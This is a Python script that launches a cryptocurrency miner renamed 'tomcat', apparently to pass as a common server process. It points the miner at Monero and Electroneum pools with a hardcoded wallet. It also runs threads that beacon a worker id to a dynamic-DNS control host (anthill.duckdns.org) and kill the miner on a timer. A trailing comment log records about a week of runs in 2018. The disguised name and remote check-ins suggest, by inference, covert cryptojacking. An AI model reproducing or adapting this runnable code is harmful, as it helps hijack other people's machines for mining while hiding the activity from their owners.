import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:04.995950
#2018-02-17 16:59:05.277870
#2018-02-17 18:48:07.746807
#2018-02-17 20:37:03.879535
#2018-02-17 22:23:04.459124
#2018-02-18 00:07:05.362224
#2018-02-18 01:58:04.611431
#2018-02-18 03:47:04.865653
#2018-02-18 05:33:07.378575
#2018-02-18 07:26:06.408806
#2018-02-18 09:13:04.003573
#2018-02-18 10:58:07.540622
#2018-02-18 12:46:05.748904
#2018-02-18 14:32:01.667455
#2018-02-18 16:22:04.010320
#2018-02-18 18:11:06.460170
#2018-02-18 19:57:03.952688
#2018-02-18 21:43:07.367669
#2018-02-18 23:32:03.655219
#2018-02-19 01:18:06.630785
#2018-02-19 03:06:01.971135
#2018-02-19 04:51:05.656879
#2018-02-19 06:37:04.553729
#2018-02-19 08:27:05.296560
#2018-02-19 10:16:02.076279
#2018-02-19 12:03:06.302400
#2018-02-19 13:49:07.596092
#2018-02-19 15:39:08.329078
#2018-02-19 17:26:04.962212
#2018-02-19 19:14:03.847082
#2018-02-19 21:01:06.174858
#2018-02-19 22:48:05.981759
#2018-02-20 00:31:05.532882
#2018-02-20 02:19:05.742542
#2018-02-20 04:10:05.215921
#2018-02-20 05:53:05.962350
#2018-02-20 07:40:09.905665
#2018-02-20 09:25:07.077123
#2018-02-20 11:09:06.855296
#2018-02-20 12:55:04.904404
#2018-02-20 14:39:03.593536
#2018-02-20 16:25:08.196623
#2018-02-20 18:11:05.975331
#2018-02-20 20:03:08.259014
#2018-02-20 21:49:09.236534
#2018-02-20 23:31:05.790468
#2018-02-21 01:15:07.880544
#2018-02-21 03:02:03.431188
#2018-02-21 04:48:07.277983
#2018-02-21 06:36:01.786096
#2018-02-21 08:21:19.116042
#2018-02-21 10:06:06.176140
#2018-02-21 11:56:10.429212
#2018-02-21 13:46:07.600570
#2018-02-21 15:31:01.843241
#2018-02-21 17:20:10.928123
#2018-02-21 19:07:02.155533
#2018-02-21 20:53:05.669256
#2018-02-21 22:39:02.000314
#2018-02-22 00:28:06.784576
#2018-02-22 02:16:08.060562
#2018-02-22 04:01:07.335339
#2018-02-22 05:47:03.798971
#2018-02-22 07:34:04.308137
#2018-02-22 09:22:07.192327
#2018-02-22 11:09:07.221118
#2018-02-22 12:55:07.161628
#2018-02-22 14:43:04.406863
#2018-02-22 16:28:04.939916
#2018-02-22 18:16:01.996252
#2018-02-22 20:08:05.871244
#2018-02-22 21:56:05.937024
#2018-02-22 23:43:05.537027
#2018-02-23 01:32:05.421858
#2018-02-23 03:18:03.839204
#2018-02-23 05:06:07.639584
#2018-02-23 06:51:07.366165
#2018-02-23 08:42:08.509736
#2018-02-23 10:59:07.685942
#2018-02-23 12:55:08.380666
#2018-02-23 14:41:05.166377
#2018-02-23 16:31:06.979865
#2018-02-23 18:17:08.378215
#2018-02-23 20:02:06.154167
#2018-02-23 21:47:07.610951
#2018-02-23 23:36:06.542831
#2018-02-24 01:25:05.298121
#2018-02-24 03:17:06.378228
#2018-02-24 05:02:06.714388
#2018-02-24 06:52:05.795158
#2018-02-24 08:42:01.664147
#2018-02-24 10:26:01.780247
#2018-02-24 12:21:01.877611
#2018-02-24 14:12:03.969128
#2018-02-24 15:59:04.700209
#2018-02-24 17:51:06.256833
#2018-02-24 19:39:01.252466
#2018-02-24 21:26:02.134125
#2018-02-25 00:07:07.322943
#2018-02-25 04:25:08.256706
#2018-02-25 08:07:01.271600